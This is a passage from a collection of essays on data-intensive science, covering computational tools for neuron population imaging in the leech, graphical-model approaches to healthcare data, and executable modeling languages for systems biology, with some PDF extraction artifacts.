fabricated glass electrodes with tips that are often less than a micron in diameter, and they have employed special machinery to punch the tips into the cell bodies of single neuronswith the hope that the neurons will function as they normally do within larger assemblies. Such an approach has provided data about the membrane voltages and action 83 potentials of a single cell or just a handful of cells. However, the relationship between neurobiologists and data about nervous systems is changing. New recording machinery is making data available on the activity of large populations of neurons. Such data makes computational procedures increasingly critical as experimental tools for unlocking new understanding about the connections, architecture, and overall machinery of nervous systems. New opportunities for experimentation and modeling on a wider scale have become available with the advent of fast optical imaging methods. With this approach, dyes and photomultipliers are used to track calcium levels and membrane potentials of neurons, with high spatial and temporal resolution. These high-fidelity optical recordings allow neurobiologists to examine the simultaneous activity of populations of tens to thousands of neurons. In a relatively short time, data available about the activity of neurons has grown from a trickle of information gleaned via sampling of small numbers of neurons to large-scale observations of neuronal activity. Spatiotemporal datasets on the behaviors of populations of neurons pose tantalizing inferential challenges and opportunities. The next wave of insights about the neurophysiological basis for cognition will likely come via the application of new kinds of computational lenses that direct an information-theoretic optics onto streams of spatiotemporal population data. We foresee that neurobiologists studying populations of neurons will one day rely on tools that serve as computational microscopessystems that harness machine learning, reasoning, and visualization to help neuroscientists formulate and test hypotheses from data. Inferences derived from the spatiotemporal data streaming from a preparation might even be overlaid on top of traditional optical views during experiments, augmenting those views with annotations that can help with the direction of the investigation. Intensive computational analyses will serve as the basis for modeling and visualization of the intrinsically high-dimensional population data, where multiple neuronal units interact and contribute to the activity of other neurons and assemblies, and where interactions are potentially context sensitivecircuits and flows might exist dynamically, transiently, and even simultaneously on the same neuronal substrate. Computation and Complexity We see numerous opportunities ahead for harnessing fast-paced computations to assist neurobiologists with the science of making inferences from neuron popula- 84 tion data. Statistical analyses have already been harnessed in studies of populations of neurons. For example, statistical methods have been used to identify and characterize neuronal activity as trajectories in large dynamical state spaces [1]. We are excited about employing richer machine learning and reasoning to induce explanatory models from case libraries of neuron population data. Computational procedures for induction can assist scientists with teasing insights from raw data on neuronal activity by searching over large sets of alternatives and weighing the plausibility of different explanatory models. The computational methods can be tasked with working at multiple levels of detail, extending upward from circuitcentric exploration of local connectivity and functionality of neurons to potentially valuable higher-level abstractions of neuronal populationsabstractions that may provide us with simplifying representations of the workings of nervous systems. Beyond generating explanations from observations, inferential models can be harnessed to compute the expected value of information, helping neuroscientists to identify the best next test to perform or information to gather, in light of current goals and uncertainties. Computing the value of information can help to direct interventional studies, such as guidance on stimulating specific units, clamping the voltage of particular cells, or performing selective modification of cellular activity via agonist and antagonist pharmacological agents. We believe that there is promise in both automated and interactive systems, including systems that are used in real-time settings as bench tools. Computational tools might one day even provide real-time guidance for probes and interventions via visualizations and recommendations that are dynamically generated during imaging studies. Moving beyond the study of specific animal systems, computational tools for analyzing neuron population data will likely be valuable in studies of the construction of nervous systems during embryogenesis, as well as in comparing nervous systems of different species of animals. Such studies can reveal the changes in circuitry and function during development and via the pressures of evolutionary adaptation. Spectrum of Sophistication Neurobiologists study nervous systems of invertebrates and vertebrates across a spectrum of complexity. Human brains are composed of about 100 billion neurons that interact with one another via an estimated 100 trillion synapses. In contrast, the brain of the nematode, Caenorhabditis elegans (C. elegans), has just 302 neurons. Such invertebrate nervous systems offer us an opportunity to learn about the prin- 85 ciples of neuronal systems, which can be generalized to more complex systems, including our own. For example, C. elegans has been a model system for research on the structure of neuronal circuits; great progress has been achieved in mapping the precise connections among its neurons. Many neurobiologists choose to study simpler nervous systems even if they are motivated by questions about the neurobiological nature of human intelligence. Nervous systems are derived from a family tree of refinements and modifications, so it is likely that key aspects of neuronal information processing have been conserved across brains of a range of complexities. While new abstractions, layers, and interactions may have evolved in more complex nervous systems, brains of different complexities likely rely on a similar neuronal fabricand there is much that we do not know about that fabric. In work with our colleagues Ashish Kapoor, Erick Chastain, Johnson Apacible, Daniel Wagenaar, and Paxon Frady, we have been pursuing the use of machine learning, reasoning, and visualization to understand the machinery underlying decision making in Hirudo, the European medicinal leech. We have been applying computational analyses to make inferences from optical data about the activity of populations of neurons within the segmental ganglia of Hirudo. The ganglia are composed of about 400 neurons, and optical imaging reveals the activity of approximately 200 neurons at a timeall the neurons on one side of the ganglion. Several frames of the optical imaging of Hirudo are displayed in Figure 1. The brightness Figure 1. 86 of each of the imaged neurons represents the level of depolarization of the cells, which underlies the production of action potentials. We are developing analyses and assembling tools in pursuit of our vision of developing computational microscopes for understanding the activity of neuronal populations and their relationship to behavior. In one approach, we generate graphical probabilistic temporal models that can predict the forthcoming behavior of Hirudo from a short window of analysis of population data. The models are generated by searching over large spaces of feasible models in which neurons, and abstractions of neurons, serve as random variables and in which temporal and atemporal dependencies are inferred among the variables. The methods can reveal modules of neurons that appear to operate together and that can appear dynamically over the course of activity leading up to decisions by the animal. In complementary work, we are considering the role of neuronal states in defining trajectories through state spaces of a dynamical system. Emergence of a Computational Microscope We have started to build interactive viewers and tools that allow scientists to manipulate inferential assumptions and parameters and to inspect implications visually. For example, sliders allow for smooth changes in thresholds for admitting connections among neurons and for probing strengths of relationships and membership in modules. We would love to see a world in which such tools are shared broadly among neuroscientists and are extended with learning, inference, and visualization components developed by the neuroscience community. Figure 2 on the next page shows a screenshot of a prototype tool we call the MSR Computational Microscope, which was developed by Ashish Kapoor, Erick Chastain, and Eric Horvitz at Microsoft Research as part of a broader collaboration with William Kristan at the University of California, San Diego, and Daniel Wagenaar at California Institute of Technology. The tool allows users to visualize neuronal activity over a period of time and then explore inferences about relationships among neurons in an interactive manner. Users can select from a variety of inferential methods and specify modeling assumptions. They can also mark particular neurons and neuronal subsets as focal points of analyses. The view in Figure 2 shows an analysis of the activity of neurons in the segmental ganglia of Hirudo. Inferred informational relationships among cells are displayed via highlighting of neurons and through the generation of arcs among neurons. Such inferences can help to guide exploration and confirmation of physical connections among neurons. 87 Figure 2. Possible connections and clusters inferred from population data during imaging of Hirudo. Figure 3. Inferred informational relationships among neurons in a segmental ganglion of Hirudo. Measures of similarity of the dynamics of neuronal activity over time are displayed via arcs and clusters. 88 Figure 3 shows another informational analysis that spatially clusters cells that behave in a similar manner in the ganglia of Hirudo over a set of trials. The analysis provides an early vision of how information-theoretic analyses might one day help neurobiologists to discover and probe interactions within and between neuronal subsystems. We are only at the start of this promising research direction, but we expect to see a blossoming of analyses, tools, and a broader sub-discipline that focuses on the neuroinformatics of populations of neurons. We believe that computational methods will lead us to effective representations and languages for understanding neuronal systems and that they will become essential tools for neurobiologists to gain insight into the myriad mysteries of sensing, learning, and decision making by nervous systems. References [1] K. L. Briggman, H. D. I. Abarbanel, and W. B. Kristan, Jr., Optical imaging of neuronal populations during decision-making, Science, vol. 307, pp. 896901, 2005, doi: 10.1126/science.110. 89 H E A LT H A N D W E L L B E I N G is rising rapidly, far exceeding the capacity to deliver personal or public health benefits from analyzing this data [1]. Three key elements of the rise are electronic health records (EHRs), biotechnologies, and scientific outputs. We discuss these in turn below, leading to our proposal for a unified modeling approach that can take full advantage of a data-intensive environment. he quantity of available healthcare data Healthcare organizations around the world, in both low- and highresource settings, are deploying EHRs. At the community level, EHRs can be used to manage healthcare services, monitor the publics health, and support research. Furthermore, the social benefits of EHRs may be greater from such population-level uses than from individual care uses. The use of standard terms and ontologies in EHRs is increasing the structure of healthcare data, but clinical coding behavior introduces new potential biases. For example, the introduction of incentives for primary care professionals to tackle particular conditions may lead to fluctuations in the amount of coding of new cases of those conditions [2]. On the other hand, the falling cost of devices for remote monitoring and near-patient testing is leading to more capture of objective measures in EHRs, which can provide 91 less biased signals but may create the illusion of an increase in disease prevalence simply due to more data becoming available. Some patients are beginning to access and supplement their own records or edit a parallel health record online [3]. The stewardship of future health records may indeed be more with individuals (patients/citizens/consumers) and communities (families/local populations etc.) than with healthcare organizations. In summary, the use of EHRs is producing more data-intensive healthcare environments in which substantially more data are captured and transferred digitally. Computational thinking and models of healthcare to apply to this wealth of data, however, have scarcely been developed. Biotechnologies Biotechnologies have fueled a boom in molecular medical research. Some techniques, such as genome-wide analysis, produce large volumes of data without the sampling bias that a purposive selection of study factors might produce. Such datasets are thus more wide ranging and unselected than conventional experimental measurements. Important biases can still arise from artifacts in the biotechnical processing of samples and data, but these are likely to decrease as the technologies improve. A greater concern is the systematic error that lies outside the data landscapefor example, in a metabolomic analysis that is confounded by not considering the time of day or the elapsed time from the most recent meal to when the sample was taken. The integration of different scales of data, from molecular-level to population-level variables, and different levels of directness of measurement of factors is a grand challenge for data-intensive health science. When realistically complex multi-scale models are available, the next challenge will be to make them accessible to clinicians and patients, who together can evaluate the competing risks of different options for personalizing treatment. Scientific Outputs The outputs of health science have been growing exponentially [4]. In 2009, a new paper is indexed in PubMed, the health science bibliographic system, on average every 2 minutes. The literature-review approach to managing health knowledge is therefore potentially overloaded. Furthermore, the translation of new knowledge into practice innovation is slow and inconsistent [5]. This adversely affects not only clinicians and patients who are making care decisions but also researchers who are reasoning about patterns and mechanisms. There is a need to combine the mining 92 Expertise Data COPD Hypothesis Statistical Testing Hypothesis Renement Independent Conclusion Expertise Data CVD Hypothesis Statistical Testing Hypothesis Renement Independent Conclusion Expertise Data Figure 1. Lung Cancer Hypothesis Statistical Testing Hypothesis Renement Independent Conclusion Conventional approaches based on statistical hypothesis testing artificially decompose the healthcare domain into numerous sub-problems. They thereby miss a significant opportunity for statistical borrowing of strength. Chronic obstructive pulmonary disease (COPD), cardiovascular disease (CVD), and lung cancer can be considered together as a big three [6]. of evidence bases with computational models for exploring the burgeoning data from healthcare and research. Hypothesis-driven research and reductionist approaches to causality have served health science well in identifying the major independent determinants of health and the outcomes of individual healthcare interventions. (See Figure 1.) But they do not reflect the complexity of health. For example, clinical trials exclude as many as 80 percent of the situations in which a drug might be prescribedfor example, when a patient has multiple diseases and takes multiple medications [7]. Consider a newly licensed drug released for general prescription. Clinician X might prescribe the drug while clinician Y does not, which could give rise to natural experiments. In a fully developed data-intensive healthcare system in which the data from those experiments are captured in EHRs, clinical researchers could explore the outcomes of patients on the new drug compared with natural controls, and they could potentially adjust for confounding and modifying factors. However, such adjustments might be extremely complex and beyond the capability of conventional models. 93 Expertise Expertise Expertise Figure 2. We propose a unified approach to healthcare modeling that exploits the growing statistical resources of electronic health records in addition to the data collected for specific studies. A Unified Approach We propose a unified modeling approach that can take full advantage of a dataintensive environment without losing the realistic complexity of health. (See Figure 2.) Our approach relies on developments within the machine learning field over the past 10 years, which provide powerful new tools that are well suited to this challenge. Knowledge of outcomes, interventions, and confounding or modifying factors can all be captured and represented through the framework of probabilistic graphical models in which the relevant variables, including observed data, are expressed as a graph [8]. Inferences on this graph can then be performed automatically using a variety of algorithms based on local message passing, such as [9]. Compared with classical approaches to machine learning, this new framework offers a deeper integration of domain knowledge, taken directly from experts or from the literature, with statistical learning. Furthermore, these automatic inference algorithms can scale to datasets of hundreds of millions of records, and new tools such 94 as Infer.NET allow rapid development of solutions within this framework [10]. We illustrate the application of this approach with two scenarios. In scenario 1, an epidemiologist is investigating the genetic and environmental factors that predispose some children to develop asthma. He runs a cohort study of 1,000 children who have been followed for 10 years, with detailed environmental and physiological measures as well as data on over half a million of the 3 million genetic factors that might vary between individuals. The conventional epidemiology approach might test predefined hypotheses using selected groups of genetic and other factors. A genome-wide scanning approach might also be taken to look for associations between individual genetic factors and simple definitions of health status (e.g., current wheeze vs. no current wheeze at age 5 years). Both of these approaches use relatively simple statistical models. An alternative machine learning approach might start with the epidemiologist constructing a graphical model of the problem space, consulting literature and colleagues to build a graph around the organizing principlesay, peripheral airways obstruction. This model better reflects the realistic complexity of asthma with a variety of classes of wheeze and other signs and symptoms, and it relates them to known mechanisms. Unsupervised clustering methods are then used to explore how genetic, environmental, and other study factors influence the clustering into different groups of allergic sensitization with respect to skin and blood test results and reports of wheezing. The epidemiologist can relate these patterns to biological pathways, thereby shaping hypotheses to be explored further. In scenario 2, a clinical team is auditing the care outcomes for patients with chronic angina. Subtly different treatment plans of care are common, such as different levels of investigation and treatment in primary care before referral to specialist care. A typical clinical audit approach might debate the treatment plan, consult literature, examine simple summary statistics, generate some hypotheses, and perhaps test the hypotheses using simple regression models. An alternative machine learning approach might construct a graphical model of the assumed treatment plan, via debate and reference to the literature, and compare this with discovered network topologies in datasets reflecting patient outcomes. Plausible networks might then be used to simulate the potential effects of changes to clinical practice by running scenarios that change edge weights in the underlying graphs. Thus the families of associations in locally relevant data can be combined with evidence from the literature in a scenario-planning activity that involves clinical reasoning and machine learning. 95 Unified models clearly have the potential to influence personal health choices, clinical practice, and public health. So is this a paradigm for the future? The first paradigm of healthcare information might be considered to be the case history plus expert physician, formalized by Hippocrates more than 2,000 years ago and still an important part of clinical practice. In the second paradigm, a medical record is shared among a set of complementary clinicians, each focusing their specialized knowledge on the patients condition in turn. The third paradigm is evidence-based healthcare that links a network of health professionals with knowledge and patient records in a timely manner. This third paradigm is still in the process of being realized, particularly in regard to capturing the complexities of clinical practice in a digital record and making some aspects of healthcare computable. We anticipate a fourth paradigm of healthcare information, mirroring that of other disciplines, whereby an individuals health data are aggregated from multiple sources and attached to a unified model of that persons health. The sources can range from body area network sensors to clinical expert oversight and interpretation, with the individual playing a much greater part than at present in building and acting on his or her health information. Incorporating all of this data, the unified model will take on the role of a health avatarthe electronic representation of an individuals health as directly measured or inferred by statistical models or clinicians. Clinicians interacting with a patients avatar can achieve a more integrated view of different specialist treatment plans than they do with care records alone. The avatar is not only a statistical tool to support diagnosis and treatment, but it is also a communication tool that links the patient and the patients elected network of clinicians and other trusted caregiversfor what-if treatment discussions, for example. While initially acting as a fairly simple multi-system model, the health avatar could grow in depth and complexity to narrow the gap between avatar and reality. Such an avatar would not involve a molecular-level simulation of a human being (which we view as implausible) but would instead involve a unified statistical model that captures current clinical understanding as it applies to an individual patient. This paradigm can be extended to communities, where multiple individual avatars interact with a community avatar to provide a unified model of the communitys health. Such a community avatar could provide relevant and timely information for use in protecting and improving the health of those in the community. Scarce community resources could be matched more accurately to lifetime healthcare needs, 96 particularly in prevention and early intervention, to reduce the severity and/or duration of illness and to better serve the community as a whole. Clinical, consumer, and public health services could interact more effectively, providing both social benefit and new opportunities for healthcare innovation and enterprise. Conclusion Data alone cannot lead to data-intensive healthcare. A substantial overhaul of methodology is required to address the real complexity of health, ultimately leading to dramatically improved global public healthcare standards. We believe that machine learning, coupled with a general increase in computational thinking about health, can be instrumental. There is arguably a societal duty to develop computational frameworks for seeking signals in collections of health data if the potential benefit to humanity greatly outweighs the risk. We believe it does. References [1] J. Powell and I. Buchan, Electronic health records should support clinical research, J. Med. Internet Res., vol. 7, no. 1, p. e4, Mar. 14, 2005, doi: 10.2196/jmir.7.1.e4. [2] S. de Lusignan, N. Hague, J. van Vlymen, and P. Kumarapeli, Routinely-collected general practice data are complex, but with systematic processing can be used for quality improvement and research, Prim. Care. Inform., vol. 14, no. 1, pp. 5966, 2006. [3] L. Bos and B. Blobel, Eds., Medical and Care Compunetics 4, vol. 127 in Studies in Health Technology and Informatics series. Amsterdam: IOS Press, pp. 311315, 2007. [4] B. G. Druss and S. C. Marcus, Growth and decentralization of the medical literature: implications for evidence-based medicine, J. Med. Libr. Assoc., vol. 93, no. 4, pp. 499501, Oct. 2005, PMID: PMC1250328. [5] A. Mina, R. Ramlogan, G. Tampubolon, and J. Metcalfe, Mapping evolutionary trajectories: Applications to the growth and transformation of medical knowledge, Res. Policy, vol. 36, no. 5, pp. 789806, 2007, doi: 10.1016/j.respol.2006.12.007. [6] M. Gerhardsson de Verdier, The Big Three Concept - A Way to Tackle the Health Care Crisis? Proc. Am. Thorac. Soc., vol. 5, pp. 800805, 2008. [7] M. Fortin, J. Dionne, G. Pinho, J. Gignac, J. Almirall, and L. Lapointe, Randomized controlled trials: do they have external validity for patients with multiple comorbidities? Ann. Fam. Med., vol. 4, no. 2, pp. 104108, Mar.Apr. 2006, doi: 10.1370/afm.516. [8] C. Bishop, Pattern Recognition and Machine Learning. Springer, 2006. [9] J. Winn and C. Bishop, Variational Message Passing, J. Mach. Learn. Res., vol. 6, pp. 661694, 2005. [10] T. Minka, J. Winn, J. Guiver, and A. Kannan, Infer.NET, Microsoft Research Cambridge,. 97 H E A LT H A N D W E L L B E I N G Luca Car delli Microsoft Research Cor r ado Pr iami Microsoft Research University of Trento Centre for Computational and Systems Biology and University of Trento n a recent paper, nobel laureate paul nurse calls for a better understanding of living organisms through both the development of the appropriate languages to describe information processing in biological systems and the generation of more effective methods to translate biochemical descriptions into the functioning of the logic circuits that underpin biological phenomena. [1] The language that Nurse wishes to see is a formal language that can be automatically translated into machine executable code and that enables simulation and analysis techniques for proving properties of biological systems. Although there are many approaches to the formal modeling of living systems, only a few provide executable descriptions that highlight the mechanistic steps that make a system move from one state to another [2]. Almost all the techniques related to mathematical modeling abstract from these individual steps to produce global behavior, usually averaged over time. Computer science provides the key elements to describe mechanistic steps: algorithms and programming languages [3]. Following the metaphor of molecules as processes introduced in [4], process calculi have been identified as a promising tool to model biological systems that are inherently complex, concurrent, and driven by the interactions of their subsystems. 99 Causality is a key difference between language-based modeling approaches and other techniques. In fact, causality in concurrent languages is strictly related to the notion of concurrency or independence of events, which makes causality substantially different from temporal ordering. An activity A causes an activity B if A is a necessary condition for B to happen and A influences the activity of Bi.e., there is a flow of information from A to B. The second part of the condition defining causality makes clear the distinction between precedence (related only to temporal ordering) and causality (a subset of the temporal ordering in which the flow of information is also considered) [5]. As a consequence, the list of the reactions performed by a system does not provide causal information but only temporal information. It is therefore mandatory to devise new modeling and analysis tools to address causality. Causality is a key issue in the analysis of complex interacting systems because it helps in dissecting independent components and simplifying models while also allowing us to clearly identify cross-talks between different signaling cascades. Once the experimentalist observes an interesting event in a simulation, it is possible to compact the previous history of the system, exposing only the preceding events that caused the interesting one. This can give precise hints about the causes of a disease, the interaction of a drug with a living system (identifying its efficacy and its side effects), and the regulatory mechanisms of oscillating behaviors. Causality is a relationship between events, and as such it is most naturally studied within discrete models, which are in turn described via algorithmic modeling languages. Although many modeling languages have been defined in computer science to model concurrent systems, many challenges remain to building algorithmic models for the system-level understanding of biological processes. These challenges include the relationship between low-level local interactions and emergent high-level global behavior; the incomplete knowledge of the systems under investigation; the multi-level and multi-scale representations in time, space, and size; and the causal relations between interactions and the context awareness of the inner components. Therefore, the modeling formalisms that are candidates to propel algorithmic systems biology should be complementary to and interoperable with mathematical modeling. They should address parallelism and complexity, be algorithmic and quantitative, express causality, and be interaction driven, composable, scalable, and modular. Language Visualization 100 usability. A modeling language must be understandable by biologists so they can relate it to their own informal models and to experiments. One attempt by biologists to connect formal languages and informal descriptions of systems involved the use of a constrained natural language organized in the form of tables that collect all the information related to the structure and dynamic of a system. This narrative representation is informative and structured enough to be compiled into formal description that is amenable to simulation and analysis [6, 7]. Although the narrative modeling style is not yet visual, it is certainly more readable and corresponds better to the intuition of biologists than a formal (programming) language. The best way to make a language understandable to scientists while also helping to manage complexity is to visualize the language. This is harder than visualizing data or visualizing the results of simulations because a language implicitly describes the full kinetics of a system, including the dynamic relationships between events. Therefore, language visualization must be dynamic, and possibly reactive [8], which means that a scientist should be able to detect and insert events in a running simulation by direct intervention. This requires a one-to-one correspondence between the internal execution of a formal language and its visualization so that the kinetics of the language can be fully reflected in the kinetics of the visualization and vice versa. This ability to fully match the kinetics of a general (Turing-complete) modeling language to visual representations has been demonstrated, for example, for picalculus [9], but many practical challenges remain to adapting such general methods to specific visualization requirements. (See Figure 1 on the next page.) One such requirement, for example, is the visualization and tracking of molecular complexes; to this end, the BlenX language [10] and its support tools permit explicit representation of complexes of biological elements and examination of their evolution in time [11]. (See Figure 2 on page 103.) The graphical representation of complexes is also useful in studying morphogenesis processes to unravel the mechanistic steps of pattern formation. (See Figure 3 on page 104.) Analysis Model construction is one step in the scientific cycle, and appropriate modeling languages (along with their execution and visualization capabilities) are important, particularly for modeling complex systems. Ultimately, however, one will want to analyze the model using a large number of techniques. Some of these techniques may be centered on the underlying mathematical framework, such as the analysis of 101 differential equations, Markov chains, or Petri nets generated from the modproduceM degradeM el. Other techniques may be centered +tpn on the model description (the language in which the model is written). M TM -tpnv For example, we may want to know whether two different model descrip+pep -pep +pepa -pepq tions actually represent the same behavior, by some measure of behavior equivalence. This kind of model cor-tpn respondence can arise, for example, MP TMP from apparently different biological systems that work by the same fundaegress mental principles. A similar question is whether we can simplify (abstract) a model description and still preserve degrade its behavior, again by some measure of MeP behavior equivalence that may mask some unimportant detail. Behavioral equivalences are in fact Figure 1. a primary tool in computer science This diagram can be placed in 1:1 corresponfor verifying computing systems. For dence with formal stochastic pi-calculus models [9, 12, 13] so that one can edit either the instance, we can use equivalences to diagrams or the models. The nodes represent ensure that an implementation is in molecular states (the node icons are just for agreement with a specification, abillustration), and the labeled arcs represent stracting as much as possible from interactions with other molecules in the envisyntactic descriptions and instead foronment. The models use a biochemical variant cusing on the semantics (dynamic) of of pi-calculus with rate weight as superscripts specifications and implementations. and with +/- for binding and unbinding. So far, biology has focused on syntactic relationships between genes, genomes, and proteins. An entirely new avenue of research is the investigation of the semantic equivalences of biological entities populating complex networks of interactions. This approach could lead to new visions of systems and reinforce the need for computer science to enhance systems biology. Biology is a data-intensive science. Biological systems are huge collections of in- 102 Figure 2. The green S boxes in the diagram represent entities populating the biological system under consideration. The light blue rectangles attached to the green boxes represent the active interfaces/ domains available for complexation and decomplexation. The diagram shows how the simulation of the BlenX specification formed a ring complex and provides the position and the connections between boxes for inspection. teracting components. The last decade of research has contributed to identifying and classifying those components, especially at the molecular level (gene, metabolites, proteins). To make sense of the large amount of data available, we need to implicitly represent them in compact and executable models so that executions can recover the available data as needed. This approach would merge syntax and semantics in unifying representations and would create the need for different ways of storing, retrieving, and comparing data. A model repository that represents the dynamics of biological processes in a compact and mechanistic manner would therefore be extremely valuable and could heighten the understanding of biological data and the basic biological principles governing life. This would facilitate predictions and the optimal design of further experiments to move from data collection to knowledge production. 103 Figure 3. The green, red, and blue S boxes in the diagram represent different species populating the biological system under consideration. The light blue rectangles attached to the boxes represent the active interfaces/domains available for complexation and decomplexation. The diagram elucidates how patterns are formed in morphogenesis processes simulated by BlenX specifications. Analysis Visualization Executable models need visualization to make their execution interactive (to dynamically focus on specific features) and reactive (to influence their execution on the fly). Execution is one form of analysis; other analysis methods will need visualization as well. For complex systems, the normal method of batch analysis, consisting of running a complex analysis on the model and then mining the output for clues, needs to be replaced with a more interactive, explorative approach. Model abstraction is an important tool for managing complexity, and we can envision performing this activity interactivelyfor example, by lumping components together or by hiding components. The notion of lumping will then need an appropriate visualization and an appropriate way of relating the behavior of the original components to the behavior of the lumped components. This doesnt mean visualizing the modeling language, but rather visualizing an abstraction function between 104 models. We therefore suggest visualizing the execution of programs/models in such a way that the output is linked to the source code/model specification and the graphical abstraction performed by the end user is transformed into a formal program/ model transformation. The supporting tool would then check which properties the transformation is preserving or not preserving and warn the user accordingly. All the above reinforces the need for a formal and executable language to model biology as the core feature of an in silico laboratory for biologists that could be the next-generation high-throughput tool for biology. Acknowledgments The authors thank Andrew Phillips and Lorenzo Dematt for preparing the figures. References [1] P. Nurse, Life, Logic and Information, Nature, vol. 454, pp. 424426, 2008, doi: 10.1038/ 454424a. [2] J. Fisher and T. Henzinger, Executable Cell Biology, Nature Biotechnology, vol. 25, pp. 1239 1249, 2007, doi: 10.1038/nbt1356. [3] C. Priami, Algorithmic Systems Biology: An opportunity for computer science, Commun. ACM, June 2009, doi: 10.1145/1506409.1506427. [4] A. Regev and E. Shapiro, Cells as computation, Nature, vol. 419, p. 343, 2002, doi: 10.1038/419343a. [5] P. Degano and C. Priami, Non-interleaving semantics of mobile processes, Theor. Comp. Sci. vol. 216, no. 12, pp. 237270, 1999. [6] M. L. Guerriero, J. Heath, and C. Priami, An automated translation from a narrative language for biological modelling into process algebra, Proc. of CMSB 2007, LNBI 4695, 2007, pp. 136151, doi: 10.1007/978-3-540-75140-3_10. [7] M. L. Guerriero, A. Dudka, N. Underhill-Day, J. Heath, and C. Priami, Narrative-based computational modelling of the Gp130/JAK/STAT signalling pathway, BMC Syst. Biol., vol. 3, no. 1, p. 40, 2009, doi: 10.1186/1752-0509-3-40. [8] S. Efroni, D. Harel, and I. R. Cohen, Reactive Animation: Realistic Modeling of Complex Dynamic Systems, Computer, vol. 38, no. 1, pp. 3847, Jan. 2005, doi: 10.1109/MC.2005.31. [9] A. Phillips, L. Cardelli, and G. Castagna, A Graphical Representation for Biological Processes in the Stochastic Pi-calculus, Trans. Comput. Syst. Biol., VII - LNCS 4230, 2006, pp. 123152, doi: 10.1007/11905455_7. [10] L. Dematt, C. Priami, and A. Romanel, The BlenX Language: a tutorial, Formal Meth. Comput. Syst. Biol., LNCS 5016, 2008, pp. 313365, doi: 10.1145/1506409.1506427. [11] L. Dematt, C. Priami, and A. Romanel, The Beta Workbench: a computational tool to study the dynamics of biological systems, Brief Bioinform, vol. 9, no. 5, pp. 437449, 2008, doi: 10.1093/ bib/bbn023. [12] C. Priami, Stochastic pi-calculus, Comp. J., vol. 38, no. 6, pp. 578589, 1995, doi: 10.1093/ comjnl/38.7.578. [13] A. Phillips and L. Cardelli, Efficient, Correct Simulation of Biological Processes in Stochastic Pi-calculus, Proc. Comput. Meth. Syst. Biol., Edinburgh, 2007, pp. 184199, doi: 10.1007/978-3540-75140-3_13. 105 3. SCIENTIFIC INFRASTRUCTURE s ci e n t i f i c i n f r a s t r u c t u r e Introduction The articles in Part 3 of this book use a range of dramatic metaphors, such as explosion, tsunami, and even the big bang, to strikingly illustrate how scientific research will be transformed by the ongoing creation and availability of high volumes of scientific data. Although the imagery may vary, these authors share a common intent by addressing how we must adjust our approach to computational science to handle this new proliferation of data. Their choice of words is motivated by the opportunity for research breakthroughs afforded by these large and rich datasets, but it also implies the magnitude of our cultures loss if our research infrastructure is not up to the task. Abbotts perspective across all of scientific research challenges us with a fundamental question: whether, in light of the proliferation of data and its increasing availability, the need for sharing and collaboration, and the changing role of computational science, there should be a new path for science. He takes a pragmatic view of how the scientific community will evolve, and he is skeptical about just how eager researchers will be to embrace techniques such as ontologies and other semantic technologies. While avoiding dire portents, Abbott is nonetheless vivid in characterizing a disconnect between the supply of scientific knowledge and the demands of the private and government sectors. arning! 109 To bring the issues into focus, Southan and Cameron explore the tsunami of data growing in the EMBL-Bank databasea nucleotide sequencing information service. Throughout Part 3 of this book, the field of genetic sequencing serves as a reasonable proxy for a number of scientific domains in which the rate of data production is brisk (in this case, a 200% increase per annum), leading to major challenges in data aggregation, workflow, backup, archiving, quality, and retention, to name just a few areas. Larus and Gannon inject optimism by noting that the data volumes are tractable through the application of multicore technologiesprovided, of course, that we can devise the programming models and abstractions to make this technical innovation effective in general-purpose scientific research applications. Next, we revisit the metaphor of a calamity induced by a data tidal wave as Gannon and Reed discuss how parallelism and the cloud can help with scalability issues for certain classes of computational problems. From there, we move to the role of computational workflow tools in helping to orchestrate key tasks in managing the data deluge. Goble and De Roure identify the benefits and issues associated with applying computational workflow to scientific research and collaboration. Ultimately, they argue that workflows illustrate primacy of method as a crucial technology in data-centric research. Fox and Hendler see semantic eScience as vital in helping to interpret interrelationships of complex concepts, terms, and data. After explaining the potential benefits of semantic tools in data-centric research, they explore some of the challenges to their smooth adoption. They note the inadequate participation of the scientific community in developing requirements as well as a lack of coherent discussion about the applicability of Web-based semantic technologies to the scientific process. Next, Hansen et al. provide a lucid description of the hurdles to visualizing large and complex datasets. They wrestle with the familiar topics of workflow, scalability, application performance, provenance, and user interactions, but from a visualization standpoint. They highlight that current analysis and visualization methods lag far behind our ability to create data, and they conclude that multidisciplinary skills are needed to handle diverse issues such as automatic data interpretation, uncertainty, summary visualizations, verification, and validation. Completing our journey through these perils and opportunities, Parastatidis considers how we can realize a comprehensive knowledge-based research infrastructure for science. He envisions this happening through a confluence of traditional scientific computing tools, Web-based tools, and select semantic methods. 110 SCIENTIFIC INFRASTRUCTURE s ci e n t i f i c i n f r a s t r u c t u r e he scientific challenges of the 21st century will strain the partnerships between government, industry, and academia that have developed and matured over the last century or so. For example, in the United States, beginning with the establishment of the National Science Foundation in 1950, the nations research university system has blossomed and now dominates the basic research segment. (The applied research segment, which is far larger, is primarily funded and implemented within the private sector.) One cannot overstate the successes of this system, but it has come to be largely organized around individual science disciplines and rewards individual scientists efforts through publications and the promotion and tenure process. Moreover, the eternal restlessness of the system means that researchers are constantly seeking new ideas and new funding [1, 2]. An unexpected outcome of this system is the growing disconnect between the supply of scientific knowledge and the demand for that knowledge from the private and government sectors [3, 4]. The internal reward structure at universities, as well as the peer review system, favors research projects that are of inherent interest to the scientific community but not necessarily to those outside the academic community. 111 New Drivers It is time to reexamine the basic structures underlying our research enterprise. For example, given the emerging and urgent need for new approaches to climate and energy research in the broad context of sustainability, fundamental research on the global climate system will continue to be necessary, but businesses and policymakers are asking questions that are far more interdisciplinary than in the past. This new approach is more akin to scenario development in support of risk assessment and management than traditional problem solving and the pursuit of knowledge for its own sake. In climate science, the demand side is focused on feedback between climate change and socioeconomic processes, rare (but high-impact) events, and the development of adaptive policies and management protocols. The science supply side favors studies of the physical and biological aspects of the climate system on a continental or global scale and reducing uncertainties (e.g., [5]). This misalignment between supply and demand hampers societys ability to respond effectively and in a timely manner to the changing climate. Recent History The information technology (IT) infrastructure of 25 years ago was well suited to the science culture of that era. Data volumes were relatively small, and therefore each data element was precious. IT systems were relatively expensive and were accessible only to experts. The fundamental workflow relied on a data collection system (e.g., a laboratory or a field sensor), transfer into a data storage system, data processing and analysis, visualization, and publication. Figure 1 shows the architecture of NASAs Earth Observing System Data and Information System (EOSDIS) from the late 1980s. Although many thought that EOSDIS was too ambitious (it planned for 1 terabyte per day of data), the primary argument against it was that it was too centralized for a system that needed to be science driven. EOSDIS was perceived to be a data factory, operating under a set of rigorous requirements with little opportunity for knowledge or technology infusion. Ultimately, the argument was not about centralized versus decentralized but rather who would control the requirements: the science community or the NASA 